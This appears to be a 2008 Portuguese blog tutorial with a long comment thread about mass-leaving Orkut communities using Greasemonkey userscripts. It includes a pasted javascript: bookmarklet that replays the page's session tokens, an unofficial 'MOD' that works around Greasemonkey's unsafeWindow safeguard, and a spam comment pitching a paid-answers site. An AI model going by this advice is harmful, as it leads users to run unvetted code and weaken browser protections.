Sair de todas comunidades do Orkut


Esse é o ÚNICO jeito de sair de todas as comunidades não há outra forma.

Atualizado (07/11/08): Outro método para sair de todas as comunidades foi descoberto! Confira aqui.

Muitas pessoas foram entrando ao tempo em diversas comunidades, e quando viram, estava uma bagunça.
Com as ferramentas a seguir, será fácil sair de todas comunidades ao mesmo tempo, poupando um bom tempo!
• Links dos downloads, siga a ordem abaixo, não tem erro.

  1. Firefox: http://br.mozdev.org/firefox/download.html
  2. Greasemonkey(extensão para o firefox): https://addons.mozilla.org/firefox/748/
  3. Join Comunidades(extensão para o GreaseMonkey): http://www.greasemonkey.sitesbr.net/join_redir.asp
  4. Zerar Comunidades(extensão para o GreaseMonkey): http://www.greasemonkey.sitesbr.net/zeracomunas_redir.asp
  5. Instalar o MOD para o funcionamento do script: http://www.sitesbr.net/br_greasemonkey.asp

Depois de tudo instalado, na sua página inicial do orkut irá aparecer novos botões, serão os botões referentes ao Join/Zerar comunidades.
Agora é bem simples, basta clicar no “ZERAR” em amarelo.


350 Respostas to “Sair de todas comunidades do Orkut”

  1. Marcelo Says:

    eu nao consegui usar nao =\

  2. infoxp Says:

    Por quê?

  3. Ricardinho Says:

    eu tbm nao consegui.

  4. infoxp Says:

    Quem não conseguiu por favor explique o motivo!
    Eu testei aqui já 2 vezes e deu certo…

  5. Rogeer Says:

    Poo..
    consegui usar, é mó massa
    vlww mllk

  6. Abdel Says:

    tipo eu eu baixei os 2 arkivos … mais onde eu colo o join e o zerar pra eles funcionarem?

  7. infoxp Says:

    Como assim Abdel, primeiro você deve instalar o Greasemonkey, depois:
    Join Comunidades(extensão para o GreaseMonkey): http://www.greasemonkey.sitesbr.net/join_redir.asp
    Zerar Comunidades(extensão para o GreaseMonkey): http://www.greasemonkey.sitesbr.net/zeracomunas_redir.asp

    Automaticamente vai aparecer no seu Orkut os botões de zerar.

  8. guilherme paiola Says:

    instalei o firefox….
    o greasemonkey
    as extenções e tudo…
    aparece os botões mas eu aperto zerar e as comunidades não zerão…
    me ajuda…

  9. infoxp Says:

    Sinceramente isso é muito estranho, quando você clica em Zerar é para aparecer uma janela informando o CMM da comunidade com um botão Ok, depois que você der Ok irão abrir outras janelas saindo automaticamente das suas comunidades. Verifique o bloqueador de Popup, desabilitando ele, depois me responda se deu certo.

  10. guilherme paiola Says:

    então o firefox tem um bloqueador instalado direto de fabrica???
    vou procurar….
    vlw

  11. infoxp Says:

    Tem sim!

  12. guilherme paiola Says:

    cara… ta dificil aki em….
    eu aperto zerar e o site parece que atualiza…
    to fikando loko…
    sera que vc como mediador ou dono do site não podia excluir minhas comunidades????
    to quase desistindo…
    o de add amigo funfa
    de entra em comunidade de veiz funfa
    o de sair de veiz funfa só esse q não
    ta me dando raiva pq to queimando a cabessa pra saber o que fazer…

  13. guilherme paiola Says:

    info xp tem msn???
    eu uso net discada e só entro de fim de semana…flw
    e ainda não consegui apagar todas comus….
    só aparece os botoes de zerar na pag inicial…
    na pag de comunidades não e mais nenhuma outra pag aparece o zerar….
    me ajuda info xp…
    tenho nivel avançado de informatica e sei manutenção de computadores ja suei pra axar mto driver …..]
    qdo não tinha no driver guide….
    mas agora isso…..
    putz…
    meu certeza que não sou eu….
    vou tentar ir a uma lan amanham e istalar tudo isso lá pra ver se dar certo…
    pq não sou eu e axo q nen o pc…..
    INFO XP me ajuda………
    vo ficar loko…
    não tem outro jeito de sair de todas comunidades???
    email: guilhermepaiola@pop.com.br
    abraço grato des de já…

  14. infoxp Says:

    Guilherme já foi postado outro jeito! Espero que dessa vez você consiga!

  15. Lílly Says:

    haushuahsuash os botões não apareceram! ¬¬

    simplesmente não, eu inclusive verifiquei, o Greasemonkey acusa que as extensões estão instaladas e ativadas, mas nada dos botões aparecerem:/

    e aí?

  16. infoxp Says:

    Lílly, muito estranho, mas os botões só aparecem depois que a página é completamente carregada.
    Verifique se o ícone do Greasemonkey está colorido!

  17. Lílly Says:

    Ok, é que o idioma do Orkut estava em Inglês, mudando para o Português eles apareceram *-*

    Mas não zera mesmo:/

  18. Thais Says:

    Naum apareceu os botões amarelos… e o ícone do baguio ta coloridoo..

  19. infoxp Says:

    Lílly, o que acontece que não zera?
    Pois eu já testei aqui várias vezes e deu tudo certo, e além do mais comentários aqui já foram postados dizendo que deu certo, explique o motivo para eu poder te ajudar.

  20. infoxp Says:

    Thais, verifique o idioma.

  21. Aline Says:

    fiz tudo certinho…os botoes aparecem…
    mas nao zera! e o bloqueador d popup ta desativado…
    oq será entao?

  22. Lílly Says:

    pois é, o mesmo que aconteceu com a Aline aconteceu comigo :T

    acho que vou desenvolver um código, se afinal o Grasemonkey que sempre me ajudou tanto não está funcionando melhor eu criar um novo jeito. aliás, descobri um jeito de entrar em todas as comunidades com o mesmo nome(por exemplo de um artista), bem simples :]

    mesmo assim, dá um boooom trabalho fazer essas coisas, então, se descobrirem porque não está funcionando ajudaria muito mesmo. Obrigada *-*

  23. infoxp Says:

    Infelizmente não posso mais ajudar vocês, pois aqui eu já testei 2 vezes e deu tudo certo, vou procurar descobrir o que está acontecendo!

  24. Aprox Says:

    Naum consegui tbm cara!
    clico no zerar mas num faz nada! =(

  25. Anônimo Says:

    Como faz pra desinstalar esses negocios?

  26. Steh Says:

    Como faz pra apagar esses negociinhos?

  27. infoxp Says:

    È só você ir com o botão direito clicar no ícone do Greasemonkey, aquele macaco, e em Gerenciar Scricts de Usuários e selecionar os scripts instalados e remover.
    Agora se você que remover o Greasemonkey é só ir em Ferramentas, no Menu, abrir os Complementos selecionar “Greasemonkey” e clicar em desinstalar.

  28. Mand' z Says:

    não consiquii fazeer issuu!

    aa paraa
    issu é kaóó

  29. infoxp Says:

    Garanto pra você que não é, eu testei aqui e exclui as minhas 1000 comunidades que eu tinha, e pode dar uma olhada lá em cima! Tem comentários dizendo que deu certo.

  30. MLeonor Says:

    Não consegui, aparecem os botões mas nada de zerar…

  31. MLeonor Says:

    Um fato interessante:

    Se eu sair pelo jeito normal, sai logo, não precisa dizer que tenho a certeza que quero sair, é só clicar em deixar comunidade mesmo!

  32. Jéah Says:

    Ahh,
    esses dowloads não abrem no meu windows vista
    , porque ?

  33. infoxp Says:

    Quais downloads?
    Você conseguiu baixar o Firerfox?

  34. Tatyh Says:

    Heey kolega ._.’

    Deu td crtinhu… tipo… baxei (y)
    Instalei (y)
    Os botões taum lá!

    Mas eu clico em ‘Zerar’ não acontec nada G-G’
    é como se eu apertac F5 oO’ E nada de apagar komuhs (yy)

    Ajuuda pow *-*
    Vlw!
    Bjoo’

  35. infoxp Says:

    Você desabilitou os popus?

  36. euOVANI Says:

    aqui tbm nao deu certo nao…

    instalei tudo

    desabilitei os popups

    clico em zerar e só atualiza

  37. infoxp Says:

    Eu tô começando a achar que não é mais possível utilizar esse método.

  38. Tatyh Says:

    tbmm to começando a axar isso:\
    😡

    tem um java q funciona, apaga tbmm… mas demora seculoos!
    e na metade trava:\

  39. Anônimo Says:

    aee irmão fiis o procedimento completo e não funfo tbm, ja desbloqueei os popups jaa fiz tudo e não funfu ;D

  40. aka Says:

    u BAGULHO não funfa😉

  41. joh Says:

    tenk instala todos? ou so um?

    ;@

  42. infoxp Says:

    Todos.

  43. lucas Says:

    info xp eu aperto no greasemonkei e fla :

    Allows you to customize the way a webpage displays using small bits of JavaScript. …

    Allows you to customize the way a webpage displays using small bits of JavaScript.

    Hundreds of scripts, for a wide variety of popular sites, are already available at http://userscripts.org.

    You can write your own scripts, too. Check out http://wiki.greasespot.net/ to get started.

    o que eu faço?

  44. infoxp Says:

    È só clicar em “Instalar agora”, tá em verde.
    Depois em instalar de novo.

  45. lucas Says:

    aaparece zerar comunidades… mais eu clico em zera e parece ke so atualiza a pagina…nao apago nada!

    o que eu faço?

  46. lucas Says:

    Info xp eu sei ke no orkut quando xega a 1000 comunidades eles flam pra vc ke ultrapassou o limie e flam pra selecionar as comunidades ke vc ker sai….mais no meu caso eu tenhu 500 comunidades… eu nao ocnsigo excluir….so atualiza…me passa sue msn..pra conversarmos….obrigado

  47. lucas Says:

    agora poko aconteceu um negocio ke pod se bom ou ruim…testei vais vezes e abriu uma janelinha dizendo: a pagina em http://www.orkut.com diz :1646708

  48. lucas Says:

    RESPONDE LOGO !

  49. infoxp Says:

    Exatamente lucas, aquela mensagem 1646708 é o CMM da comunidade que será excluída, é só clicar em ok.

  50. lucas Says:

    entaum eu clico so ke so atualiza a pagina e nao exclui nada,um fato interessante ke quando eu clico em zera tah quase no final do carregamento e volta tudo depois continua normal e so atualiza a pagina

  51. lucas Says:

    responde po

  52. infoxp Says:

    Não tem o que responder, como já disse estou achando que esse método não funciona mais.

  53. lucas Says:

    eh mesmo entuam exclui o blog

  54. infoxp Says:

    Calma Lucas, eu não vou excluir o blog por causa de 1 post, tem muita coisa interessante aqui.

  55. mina lda Says:

    Nhai…eu fiz td certinho, apareceo os botao..maix nao exclui..=/

  56. TOP Posts Info XP « Info XP Says:

    […] Sair de todas comunidades do Orkut […]

  57. Alan Says:

    Amigo fiz tudo certo aparece o botão de excluir mas não esclui nada. O que fazer? Me ajude! Obrigado.
    Alan

  58. Elô Says:

    fiz tudo,quando clico em zerar,apenas atualiza..e agora?

  59. Lauro Says:

    pow instalei tudo e nao visualizo os botoes….

  60. infoxp Says:

    Quando vc clica em Zerar apararece uma caixa com o CMM da comunidade e um botão OK, basta ir clicando em Ok😉

  61. guilherme. Says:

    eu num consegui usa…

    da erro na pagina.

  62. Gabriel Says:

    oo brother!
    aonde desabilita o popup?

  63. Erick Says:

    Xiii ! PRa add os scripts no monkey é so klica em novo script e colocá lá os arquivos join e zerar né ? Corrijam-me !
    Pois fiz isso e num apareceu nenhum botão zerar nem outra coisa !

  64. infoxp Says:

    Erick, você deve clicar no botão que o Greasemonkey vai perguntar se você deseja adicionar o script, apenas isso.

  65. Erick Says:

    huaha ! putz .. conseguiii …
    Mais clico em zerar e tipo ele atualiza a home do orkut.
    Mais as comu inda continuam … estranho … xx !

  66. Nanna.morenna Says:

    Gente, funfa sim
    Só que apos ter instalado tudo.
    Você tem que fechar o mozilla e abrir de novo
    e Entra no Orkut..
    Dae Funfa
    ;*

  67. Anônimo Says:

    FUNCIONA SIIIM,

    LIGA NAO INFOXP OS CARA SAO MTO NEWBA QREM TUDO PROOONTO
    SE VIRA UM POKO NEEH !

    ABRASS VLW

  68. infoxp Says:

    Obrigado por comentarem que esse método funciona😀 pq as pessoas ficaram duvidando, uma vez recebi um comentário, claro que não aprovei, falando palavrão e dizendo que era tudo mentira.
    As pessoas querem tudo pronto mesmo!

  69. Axvx Says:

    Como eu já desconfiava o Orkut é mal feito:
    Você pode entrar numa comunidade mas não pode sair acho que isso está fora da lei porque tudo que você faz na net você tem que conseguir desfazer conta de e-mail, comunidade etc.
    Antes obrigatorimente você tinha que colocar todos os seus dados pessoais correndo risco de vida. Acho que á um tempo atrás eles pensavam que em todo o mundo não existia pessoas más assassinos, psicopatas, ladrões etc.
    só de 2006 para cá que eles mudaram isso.
    Só entrei no orkut porque uma pessoa insistiu muito senão tava fora disso há muito tempo !!!
    E agora que quero tirar uma comunidadedo meu Orkut tenho que fazer essa gambiarra Tenha dó esses programadores do orkut tão precisando voltar para a escola de informática !!!

  70. matheus Says:

    sinto muito incomodar, mas eu não tou conseguindo baixar no site da greasemonkey, será que tem como você hospedar no rapidshare ou me passar por email?

  71. LuCiAna Says:

    Aaaaaaaaah!!!!
    eu to ficando loka pq o segundo link abre a janelinha localizar e nao a maldita executar…
    acho q vou tentar em outro pc, mas alguem pode me explicar pq isso acontece?!
    bjus

  72. thiago Says:

    eu nao sei como desativo o bloqueador de pop ups do mozila porque quando eu clico em zerar não acontece nada, acho que eu tenho que ativar pop ups

  73. lorraqn Says:

    como q eu vou baixar isso ai ??
    clickei e só ta escrito um monte de letra

    ñ tem link
    é pra eu baixar esses texto ai ????

  74. lorraqn Says:

    os testos q estão no link ??

  75. lucas Says:

    essa coisa é uma bosta

  76. DanielDN Says:

    Olá =)

    bem, eu estou tentando aki
    o método é bem útil, porém falho…

    O seguinte, eu sei bastante de computação, eu já tinha o greasemonkey no Firefox… Instalei os 2 referidos scripts, li o tutorial na página do autor explicando como utiliza-los, fiz tudo como dito… Porém, quando clico no Zerar a página atualiza e não acontece nada…

    Estou verificando se isso não ocorre devido a versão de meu Firefox (vou tentar instalar um mais antigo
    Também estou verificando se o bloqueador de pop-ups atrapalha…

    Gostaria que você me diga qual versão é seu Firefox (que funcionou).

    Desde já grato,
    DanielDN

  77. DanielDN Says:

    Achei o causador do erro

    Espero que você leia!

    Olhe:
    No relatório de erros do Firefox encontrei o seguinte erro após clicar no botão Zerar:
    “Greasemonkey access violation: unsafeWindow cannot call GM_getValue.”

    Pelo que estou percebendo o meu Firefox diz que é um comando perigoso…
    Não entendi ainda
    Espero que você me ajude!

    Desde já grato,
    DanielDN

  78. DanielDN Says:

    Consegui!

    O erro se deve a ausência do MOD do greasemonkey que o autor dos scripts fez

    Basta instalar esse mod:
    http://www.sitesbr.net/br_greasemonkey.asp

    Agora funcionou

    Muito obrigado!
    Ótimo Blog =)
    DanielDN

  79. bart Says:

    boa lek funfo certinho vlw

    ;D

  80. bart Says:

    ei infoxp o cara ali de cima tem razao cara ta resolvido o probl é so instalar
    o outro mod: http://www.sitesbr.net/br_greasemonkey.asp

    uhu mulek

    ai agora é so alegria cara

  81. Eder Says:

    Pois é cara …
    o meu aconteceu como os de muitos aí .:/
    eu faço todos os passos , mas quando eu clico em zerar , somente carrega novamente a págia , sem aparecer nada de novo:/

  82. Eder Says:

    bá , fiz o que o DanielDN falou pra fazer …
    e deu certo , mas vai umas 12 janelas pra clicar ok e sai de 6 comunidades , aí carrega e de novo …
    é demoradinho , mas vai ^^

  83. Eder Says:

    to impedido de sair de comunidades temporariamente …
    iuehaoiueaheuheioauheaoiuhiouhe …

    amanhã eu continuo x]

  84. Débora Freire Says:

    tem que instalar todos esses programas?

  85. infoxp Says:

    Sim, é o ÚNICO jeito😉

  86. Cairo Says:

    tem que ficar dando enter toda hora, não tem outro jeito não?

  87. Cairo Says:

    realmente funciona, mais pra mim que tenho 500 comunidades,
    eu acho chato ficar dando enter.

  88. Guilherme A. Says:

    o meu caso é o mesmo do guilherme paiola
    qndo aperta em “zerar” a pagina atualiza e nao acontece nada, e no console de erro aparece:
    “Erro: Greasemonkey access violation: unsafeWindow cannot call GM_setValue.”
    oq eu devo fazer?

  89. luana Says:

    queria sair do orkut como q eu faço pra sair.

  90. infoxp Says:

    Guilherme, já disse que você tem que utilizar o PASSO 5.
    Senão ele não funciona.

  91. infoxp Says:

    Cairo: Não tem outro jeito, esse é o único.
    Também, o que vc prefere:
    Ficar dando ENTER ou sair uma por uma?!

    Não custa nada.

  92. Paty Says:

    Funfo.!
    Eh uma pouco demorado mais funfa certim.!
    Brigadão.!
    Eh melhor do q fikr saindo uma por uma.!
    ^^

  93. Angon Says:

    poo baixei tudo e talz, e ele deleta soh nq deleta de 6 em 6 :S demora pakas =/

  94. infoxp Says:

    Parem de reclamar!
    Eu tinha 1000 comunidades e utilizei esse método e sai em 50 minutos de todas, imagine se fosse uma por uma!??

  95. Caroll Says:

    Parem de reclamar!
    Eu tinha 1000 comunidades e utilizei esse método e sai em 50 minutos de todas, imagine se fosse uma por uma!??
    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

    AHaiushAIUSHaiushIAUSHUaishus

    tadinho (a) gente!

    ps: maldita inclusão digital, né?!

    eu consegui😀

  96. Joao Paulo Says:

    Meu amigo eu fiz todo a etapa necessaria e a isntalação dos 5 programinhas que vc pede no seu site.

    Porém no meu orkut não apareceu nenhuma nova opção pra deletar as comunidades não.

    Att,

    Obrigado

  97. infoxp Says:

    Acredito que você tenha errado em algum passo, não tem erro.
    Tente repetí-los.

  98. João Paulo Borges Says:

    Obrigado kra, repeti os passos, e, deu tudo certo…

    Esse negócio funciona mesmo…

    Quem reclama ai, é pq não sabe usar, e quer tudo pronto…
    Mas valew kra, deu td certo.
    Abraços!!!

  99. João Paulo Borges Says:

    Gostei dessa tua idéia, se puder depois me add no msn: jp.borges_c@hotmail.com ou entao no orkut: jp.borges_c@yahoo.com.br

    Agradeço pela atenção

    Valew…

  100. =] Says:

    funcionou aqui tbm
    vlw =]

  101. André_line2007 Says:

    comigo deu certo muito bom isso melhor doque ficar cheio de janelinhas na tela

  102. Cayo Says:

    Cara.. muito bom isso..

    mais não consegui baixar algumas coisas do site.. nao sei onde esta entende ?
    se voce podeer especificar o lugar agradeço..

  103. Gaby Says:

    Aii..eu naao acheei no site esse negocio de excluir todas as comunidades.=/

    mas funciona pro internet explorer tbeem ou eh so pro firefox?

    briiigadaa..=]

  104. infoxp Says:

    É, só pelo Firefox.
    Se você pular qualquer um dos passos não vai dar certo.

  105. juliana Says:

    mais facill vc lota o orkut de comun quando tiver com 10000
    aiiii vc pega e tenta entrar em outra aii vai apareser sair de todas aiii vc marca e sair pelo orkut

  106. milena Says:

    quero tirar uma comunidade que não estou utilizando? como faço

  107. infoxp Says:

    Basta você ir em Editar Perfil na página da comunidade e no canto esquerdo na barra lateral clique em Excluir.

  108. Roberto Says:

    nao consegui instalar o mod do greasemonkey, aparece escrito: Metadata (// ==/UserScript==) nao encontrado a instalação será cancelada

    ajudem por favor
    obrigado

  109. Roberto Says:

    eu nao consegui instalar o mod do grase monkey e aparece uma mensagem: Metadata (// ==/UserScript==) nao encontrado, a instalação será cancelada

    me ajudem por favor porque nao apareceram o botao de zerar
    muito obrigado

  110. celinhoo Says:

    Eii vei ..
    mais PC ta com uns probleminhas akii
    nao tem outro jeito de deletar as comunidades ???

  111. infoxp Says:

    Impossível, esse é o único jeito, como já dito no post.

  112. celinhoo Says:

    Eh porque meu PC nao faz mais downloads rapaz =/

    eu tenho 655 comunidades

    arranje um jeito aew brother !
    POR FAVOR ! EU TE PEçO

    vlw

  113. infoxp Says:

    Seria mais fácil resolver o problema do seu pc.
    Pq eu já procurei por tudo e nunca achei algo diferente desse método.

    Por quê você não consegue fazer downloads?

  114. celinhoo Says:

    Eh porque meu PC pegou virus !
    aii eu chameii um tec. em informatica para resolver este problema do virus ki nem entra mais no msn e nem faz mais downloads !

    aii ………..ta osso

  115. infoxp Says:

    Você poderia me informar se alguma mensagem aparece?

  116. celinhoo Says:

    Na hora do download ???

  117. infoxp Says:

    É.

  118. celinhoo Says:

    Eu tentei baixar a parada do firefox para deletar as comunidades e apareçe assim no download ->Obtendo informaçoes sobre o arquivo firefox%20etup%203.0 exe de ftp-mirror.stu.edu.tw

    tem assim !

  119. infoxp Says:

    Pelo que parece deve ser algo na configuração, só que para corrigir você deveria fazer o download de um programa que reconfigurasse a sua net.

    Portanto, você pode tentar esse jeito:
    https://infoxp.wordpress.com/2008/02/04/novo-jeito-para-sair-de-todas-as-comunidades/

  120. celinhoo Says:

    rapaz ja vou dormiir
    que demora pra me responder

    fui

  121. celinhoo Says:

    vou tentar agora !
    vlw vou dormir mais tarde
    rssrs

  122. celinhoo Says:

    esse negoco ai sai das comunidades mesmo ???

  123. celinhoo Says:

    javascript:dl=document.body; mdl=String(dl.innerHTML.match(/cmm\=\d+.>/gi)); mdl=mdl.match(/\d+/gi); y=0;function LC(x){di=document.getElementsByTagName(’input’); PT=”&POST_TOKEN=”+escape(di.POST_TOKEN.value);S=”&signature=”+escape(di.signature.value); S=S.replace(/\+/gi,’%’+’2B’).replace(/\//gi,’%’+’2F’); uod=PT+S+”&Action.unjoin”; xml=new XMLHttpRequest(); xml.open(’POST’,’CommunityUnjoin.aspx?cmm=’+x,true); xml.setRequestHeader(’Content-Type’,’application/x-www-form-urlencoded’); xml.send(uod); xml.onreadystatechange=function(){if(xml.readyState==4){ if(y<mdl.length){y++; LC(mdl[y]); di.commSearchBox.value=y+’/’+mdl.length} else{alert(’FIM!’); location.reload()} }}}; LC(mdl[0]);void(0)
    esse neh ?

    eu coloco no negoco ki coloca http://www.orkut.com
    eu copio i colo neh ?

    vlw

  124. infoxp Says:

    Como eu disse no outro post, o Orkut corrigiu o bug onde você poderia sair daquele jeito.
    Tente várias vezes, fique dando Enter.

  125. infoxp Says:

    Isso😉

  126. celinhoo Says:

    eu coloco akela codigo aonde nas partes das comunidades ou no inicio do orkut ???

  127. celinhoo Says:

    vc ganha din din fazendo isso ?

  128. infoxp Says:

    Então não tem jeito, acho que você terá que formatar seu pc.

    Claro que não, faço porque gosto.

  129. infoxp Says:

    Que estranho, meu comentário num foi.

    Essa era a minha resposta:
    Então não tem jeito, acho que você terá que formatar seu pc.

    Claro que não, faço porque gosto.

  130. celinhoo Says:

    Intaum eu vou contratar alguem pra formtatar meu PC !
    OU VC SABE FORMATAR ???
    se souber me ensine

  131. infoxp Says:

    Eu sei formatar, mas não é recomendável que você tente. É necessário ser um usuário de nível mais avançado, porém não sei qualu é o seu.

    Sugiro que você contrate um técnico, ou pode tentar seguir esse tutorial, novamente digo, não é recomendável:
    http://suportexp.wordpress.com/formatando-um-pc-e-instalando-windows-xp/

  132. Anônimo Says:

    Vou tentar !

  133. celinho Says:

    mais pra fromatar deste jeito tenki ter CD nee ??

    eu pensei ki eu poderia formatar normalmente so mexendo no PC sem prescisar de CD e de DISQUETE !
    tem outro jeito nn ???

  134. celinho Says:

    eei veii..
    pra formatar nesse site ki vc deu aii tenki ter CD bootable do windows e DISQUETE !
    eh muito complicado
    me endique outro jeito !

  135. infoxp Says:

    Não tem outro jeito.

  136. celinho Says:

    ok

  137. celinhoo Says:

    Infoxp vc sabe como desbloquear msn-plus-live ???

  138. Geovane Says:

    Putz!
    Baixei o Firefox ii Greasemonkey
    Soh kii as porras das comunit’s num zeram

    FalaH sériio neah!

  139. Diego Says:

    queee ‘…’ as CMM`s são sempre as mesmas.. as comus são sempre as mesmas, dou ok fiquei 40 minutos e não apagou nem uma se quer
    pff

  140. Diego Says:

    Só aparece as cmm`s das comus que estão na página primária..

  141. carlos Says:

    DEU CERTO!
    VALEU!!

  142. Georgia Says:

    Eu fiquei quebrando a cabeça pq no meu não dava certo, mas agora consegui.. na verdade é bem simples!

    Aparece os botões:

    Exceções Desfazer exceções Zerar

    Ai você clica em zerar. Ai ele vai dar um aviso parecido com isso: !123456 (aqui seria o cmm da comuniade) vc clica em Ok, deve aparecer em torno de 7,8 x.. Se vc tiver com o pop up habilitado ele vai aparecer em cima que por ex 8 páginas foram bloqueadas, aí vc clica em permitir pop up do orkut.

    E ai ele vai abrindo as janelinhas e saindo de todas as comunidades. Bem simples.

    Valeu a dica infoxp. Pra mim foi de grande ajuda.

  143. Thaízynha Says:

    Pooooxa, eu aquii nao conseguiii.
    eu instaleei tudoooo. (eu achooo)

    mas naoo apareceu bootão nenhum :S

  144. Thaízynha Says:

    óóo.. eu baaiixei oo Firefooox..
    basheeii oo greasemonkey…
    deu tudoo certooo..
    na hora de baiixar oo Join naoo seii que láa..
    ta dandoo eerroo seii laa…
    eu tbm naum conseguii baiixar o utliimoo script. :S

    aiii me ajuuda! ;x

  145. viviane Says:

    gente eu conssegui😀
    pow vcs devem sofre cm o povo ai neh rsrsrsrsrs
    gente tenta mais de uma vez o meu tbm ano funfo d ecara mas deu
    vlw a gente
    bjss ate mais

  146. Thaízynha Says:

    eu conseguiii, instalar tuudoo.
    mas vs nao disse q agente saii de tudoo ao mesmo tempoo? rs
    no meu naoo ta assiim naoo!
    mas taa tuudo beemm..
    pelo menoos dá pra apagaar. rsrss

    vlww aêe (!)

    Beeijãoo :**

  147. Rebeca Says:

    alguem pode me ajudar!!?
    Preciso excluir tidas as minhas comunidades.. mas uso um pc no trabalho e não posso instalar programas.. como posso fazer?
    Peguei alguns codigos mas foi um desastre, nenhum funcionou.. e sou leiga no assunto.. alguem poderia me ajudar?
    se necessario passo a minha pagina do Orkut.
    Obrigada
    Bjs

  148. Israel Says:

    olha, naum ta dando certo comigo, naum sai das comunidades, só fica lendo e nunca aparece nada =/
    aluém poderia dar uma judinha =]??

    grato, abraços

  149. Leeh Says:

    Véi eu nao consigo não ! será que vc poderia excluir pra mim? aew eu te passo meu msn pra nós conversarmos sertinho ! vlw

  150. thaina lopes Says:

    Muito bom os programas, consegui tirar as comunidades!
    Beijinhosssss!

  151. Victor Says:

    Cara, eu fiz os procedimentos em ordem 3x, mas não apareceu nenhum maldito botão aqui.. o que eu faço?

  152. Thor Says:

    q coisa, a maioria nao conseguiu

    mas vendo q a ultima conseguiu estou motivado a tentar…

    caso alguem consiga um novo metodo por favor avise.

  153. Nilmar Says:

    eu instalei td mais naum zera as comus oq faço ?

  154. tony Says:

    Da uma força esse site paga para vc responder pergunta nao eh virus e nao eh marmelada eh serio eu ja tenho 47 dolares logo logo ja estarei pegando meu din din
    agora pensa qanto deve ser 47 dolares em reais

    vale a pena ??
    eu tentei e ta dando certo
    se qiser clica no link e se cadastra

    qalqer coisa me da um toqe q eu explico
    (copia e cola no navegador)

    [LINK REMOVIDO]

  155. Thales Says:

    Po no Meu Não aparesce os Botões Não aparesceu Nada e eu Instalei tudo Direito Não aparesceu nenhum ZERO

    ajuda ae Vlwz

  156. Norivan Says:

    No no no…. parece que esta desatualizado

  157. // Fiigo Says:

    Não conseguii ¬¬ assim como ninguém conseguiiu –‘

  158. aaaaaaaaaaaaaa Says:

    nao está funcionando +!

  159. thiago Says:

    EU BAIXEI TUDO DIREITIM MAIS O GREASEMONKEY FIK NO RODAPÉ UMA MACAQUIM QUANDO EU ABRO LA GERENCIAR SCRIPT CONSTA O JOIN E O ZERA COMU MAIS NAO APARECE NENHUM BOTAO PARA APAGA NO ORKUT TUDO ISSO Q EU FLEI É NO RODAPÉ

  160. Kaarem Says:

    Naaoum ‘ coonseguii ‘ teim quee abaxaa ?
    aaan ‘

  161. Kaarem Says:

    deemoraa de maiis ‘

  162. marcuz Says:

    apareceu o botão ‘zerar’, mas quando eu clico nele não acontece nada. o que eu devo fazer? -.-

  163. Nana Says:

    EU BAIXEI TUDO DIREITIM MAIS O GREASEMONKEY FIK NO RODAPÉ UMA MACAQUIM QUANDO EU ABRO LA GERENCIAR SCRIPT CONSTA O JOIN E O ZERA COMU MAIS NAO APARECE NENHUM BOTAO PARA APAGA NO ORKUT TUDO ISSO Q EU FLEI É NO RODAPÉ

    Idem ¬¬

  164. Núbia Says:

    não consigo insta os 3 ultimos!
    a pagina nem entra!
    pq?

  165. jéssica Says:

    não consigo baixar o 3º! ://
    o que eu faço???

  166. rafael Says:

    os botões aparecem, sóq eu eele zerou apenas as comunidades que aparecem na pag inicial, e quando ele termina de deletá-las ele mais uma vez pede autorização para deletar as mesmas. não entendi o porque.

  167. Ramon Says:

    muitoo bom !
    deu certo …
    é só seguir o tuto nao tem erro

  168. Higo Says:

    tbm num conssigo num aparece nenhum botão novo aki

    e eu to fazendo tu direito!!!

  169. Leo Batera Says:

    Kd mosso o botão amarelo

    instalei tudo mais num aparçeu aki ñ!!!

  170. leonardo Says:

    nao consegui instalar o mod do greasemonkey, aparece escrito: Metadata (// ==/UserScript==) nao encontrado a instalação será cancelada

    ajudem por favor!!!!!!!!!!

  171. Carlos Says:

    Ae galera, é o seguinte..

    Eu baixei tudo certinho, to com tudo instalado..

    Agora, aonde aparece o botão Zerar???

    Tipo, eu clico com o botao direito no macaquinho (no canto direito inferior da pag) aí eu vo em Gerenciar Scripts de Usuário, depois em Zerar Comunidades, e dou Ok…

    Estou fazendo algo de errado?!
    O q tem q fazer?
    Abraços!

  172. Vânia Gomes. Says:

    Boa tarde!

    tudo bem?

    Quero excluir minhas comunidades do orkut e tentei instalar os 5 itens, mas não estou conseguindo e não sei o porque…..o primeiro item Firefox: http://br.mozdev.org/firefox/download.html eu consegui, mas a partir do segundo não mais, pois eu clico em baixar agora (como está indicado na página) e aparece uma janela dizendo para abrir ou salvar (não tem executar como no primeiro)…eu clico em salvar (no mesmo local de Firefox …em meus programas) e salva rapidamente, mas quando clico em abrir não abre nada e volta na mesma janela…tentei fazer o processo todo assim mesmo, mas não deu certo, não aparece as barras de ferramentas..zerar..no meu orkut….pq?…o q tenho q fazer?

    fico agradecida se me ajudar.

  173. infoxp Says:

    Carlos, certifique-se de que fez todos os passos corretamente, pois esse é o único jeito…

  174. mariana Says:

    ooi, eu instalei tudo certinho, tirei o negocio de pop-up, apareceram os botoes mais quando clico em zerar nao vai, apenas atualiza. apenas uma vez uma janelinha com um numero apareceu, mas somente uma vez. e nao mais. mas os outros dois botoes de excessoes e tals funcionam normalmente, pq?

    me ajudemm

  175. Vinícius Says:

    infoxp , tipo apareceram os botões e tals

    ai eu clico em zerar e ele só sai de 6 em 6 comunidades, é assim mesmo?

    Thx

  176. infoxp Says:

    Vinícius, está correto, vai de 6 em 6.

  177. Lucilene Says:

    nao consegui estalar o pluguim.manda uma mais facil.

  178. Rayssa Says:

    Concegui não.Onde fica esse botão,coloca o Print ai.

  179. vitor Says:

    como eu uso a extençãp ;õ

  180. Paulo 182 Says:

    tem ki pagar para baixar o Greasemonkey e o Zerar Comunidades ????

  181. djé Says:

    apareçe zerar mais eu cliko e nao da nada pow:/

  182. João Víctor Says:

    LoL………. prescisa de instalar o fire fox?

  183. florzinha Says:

    nao consegui…
    instalei e a barrinha nao apareceu

  184. florzinha Says:

    aah nao sei se tem barrinha morguei aki
    mais em todo caso nao apareceu nada!
    o macaquinho ta no canto com os scripts selecionados e naada

  185. lucas Says:

    aparece zerar
    eu clico e nADA

  186. Lucas Marques Says:

    Cara, no começo eu naum consegui… daí repeti as operações e funfou normal, é só seguir direitinho o passo-a-passo q funfa!
    Vlw cara!

  187. Anônimo Says:

    ajuda aonde aparece os botões no meu naum apareceu eu instalei tudo certinhoo

  188. Betinho' Says:
